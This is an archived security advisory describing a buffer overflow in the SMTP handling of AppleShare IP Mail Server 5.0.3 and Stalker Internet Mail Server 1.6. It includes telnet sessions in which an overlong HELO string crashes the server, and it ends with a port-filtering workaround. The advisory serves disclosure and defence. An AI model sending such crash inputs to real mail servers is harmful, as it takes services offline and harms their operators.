Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Macintosh :: ashare1.htm

AppleShare IP Mail Server and Stalker Internet Mail Server Buffer Overflow



Vulnerability

    AppleShare IP Mail Server and Stalker Internet Mail Server

Affected

    Mac

Description

    Chris Wedgwood found  following.  There  appears to be  what looks
    like a buffer overrun problem with AppleShare IP Mail Server.   If
    you connect  to the  SMTP port  and issue  a long  string (say 500
    bytes  or  so)  the  server  crashes  -  and because its a Mac, it
    usually crashes the  whole machine to  the point where  it needs a
    reboot.

    This  was  only  tested  against  servers  which  emit  the banner
    'AppleShare IP Mail Server 5.0.3'.  For example:

        $ telnet some.where
        Trying 1.2.3.4...
        Connected to some.where.
        Escape character is '^]'.
        220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
        HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
        [ and it just hangs ]

        $ ping some.where
        [ ...nothing... ]

    Physically checking the machine shows it has `locked up' and it a
    reboot. According to David Luyer, same is with Stalker Internet
    Mail Server:

        220-Stalker Internet Mail Server V.1.6 is ready.
        220 ESMTP is spoken here.
        HELO xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        [dead]

Solution

    You should filter 548/tcp at your router (port 548 is used by  the
    ASIP  file  sharing  stuff;  it's  analagous  to ports 137-139 for
    windows systems).  Next releases should cover this bugs.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH